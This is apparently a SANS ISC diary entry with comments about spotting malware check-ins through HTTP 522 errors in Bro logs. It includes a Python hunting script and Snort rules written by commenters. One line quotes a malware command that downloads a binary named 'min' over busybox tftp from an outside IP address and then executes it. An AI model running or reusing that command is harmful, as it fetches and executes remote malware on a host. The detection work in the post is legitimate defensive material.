Recently I ran across a tweet from Packet Watcher @jinq102030 (https://twitter.com/jinq102030/status/756476442590842880) suggesting to keep an eye on HTTP error code 522 for possible malware check-ins. A 522 code could mean several things, but for IR it potentially means a malicious host has been pulled offline and you have a client still trying to connect. So I got our intern to check Bro logs and see what he could find.
1467159441.247406 192.128.1.216 104.27.182.19 - 522
There was other traffic that turned out to be false positives, but you could easily tell that this IP was checking this site on a regular basis. Out of 4GB of compressed Bro logs for the day we only had about 200 total lines that matched, so a very low noise ratio.
cd /tmp || cd /var/ || cd /dev/;busybox tftp -r min -g 91.134.141.49;cp /bin/sh .;cat min >sh;chmod 777 sh;./sh.
-- Tom Webb @twsecblog
Tom, 59 Posts, ISC Handler, Aug 17th 2016
Aug 17th 2016
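As an added example (not part of the diary or its comments), the script below does the log check described above in Python: it parses Bro's tab-separated http.log using the #fields header, keeps only 522 responses, groups them per client/server pair, and flags pairs whose failed check-ins recur at a near-constant interval. The embedded log sample is constructed for illustration; hostnames, URIs and uids in it are placeholders.

```python
"""Hunt for recurring HTTP 522 responses in a Bro http.log (added example)."""
from collections import defaultdict
from statistics import median

# Constructed sample in Bro's ASCII log format, header trimmed to the fields used.
# The first client re-tries the same dead server about every 300 seconds.
SAMPLE_HTTP_LOG = """#separator \\x09
#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\thost\turi\tstatus_code
#types\ttime\tstring\taddr\tport\taddr\tport\tstring\tstring\tcount
1467159441.247406\tC1\t192.128.1.216\t49211\t104.27.182.19\t80\texample.invalid\t/gate.php\t522
1467159741.301220\tC2\t192.128.1.216\t49240\t104.27.182.19\t80\texample.invalid\t/gate.php\t522
1467160041.118903\tC3\t192.128.1.216\t49301\t104.27.182.19\t80\texample.invalid\t/gate.php\t522
1467160341.502117\tC4\t192.128.1.216\t49377\t104.27.182.19\t80\texample.invalid\t/gate.php\t522
1467159500.000000\tC5\t192.128.1.50\t50120\t198.51.100.7\t80\tnews.invalid\t/\t200
1467161000.000000\tC6\t192.128.1.77\t50999\t198.51.100.9\t80\tcdn.invalid\t/img.png\t522
"""


def _is_regular(gaps, tolerance=0.1):
    """True when all inter-hit gaps lie within +/-10% of their median (beacon-like)."""
    if len(gaps) < 2:
        return False
    mid = median(gaps)
    return (max(gaps) - min(gaps)) < tolerance * mid


def find_522_checkins(log_text, min_hits=3):
    """Return one summary dict per (client, server) pair that received 522s."""
    fields = None
    hits = defaultdict(list)  # (id.orig_h, id.resp_h) -> [timestamps]
    for line in log_text.splitlines():
        if line.startswith("#fields"):
            fields = line.split("\t")[1:]  # column names follow the #fields tag
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split("\t")))
        if rec.get("status_code") == "522":
            hits[(rec["id.orig_h"], rec["id.resp_h"])].append(float(rec["ts"]))
    results = []
    for (src, dst), stamps in hits.items():
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        results.append({"src": src, "dst": dst, "hits": len(stamps),
                        "median_gap_s": median(gaps) if gaps else None,
                        "regular": len(stamps) >= min_hits and _is_regular(gaps)})
    return sorted(results, key=lambda r: -r["hits"])  # noisiest pairs first


if __name__ == "__main__":
    import sys
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_HTTP_LOG
    for r in find_522_checkins(data):
        print(f"{r['src']} -> {r['dst']}: {r['hits']} x 522, regular={r['regular']}")
```

Pipe a real http.log into the script (`zcat http.*.log.gz | python3 hunt522.py`) and review the pairs flagged regular first; a single 522 against a popular site is usually an upstream outage rather than a check-in.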
Hi
That is a nice thing to check for. I made a SNORT IDS rule for that.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; metadata:18082016; priority:2; sid:6001948; rev:1;)

Happy hunting
Lenny
Anonymous
Aug 19th 2016
Oh nice signature, may I respectfully recommend flow:established,from_server and classtype:bad-unknown?
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"NF - Error 522 - Connection timed out - Check client for compromise"; flow:established,from_server; content:"522"; http_stat_code; reference:url,isc.sans.edu/forums/diary/522+Error+Code+for+the+Win/21377/; reference:url,networkforensic.dk; classtype:bad-unknown; metadata:18082016; priority:2; sid:6001948; rev:2;)

Cheers,
Nathan Fowler
Anonymous
Aug 26th 2016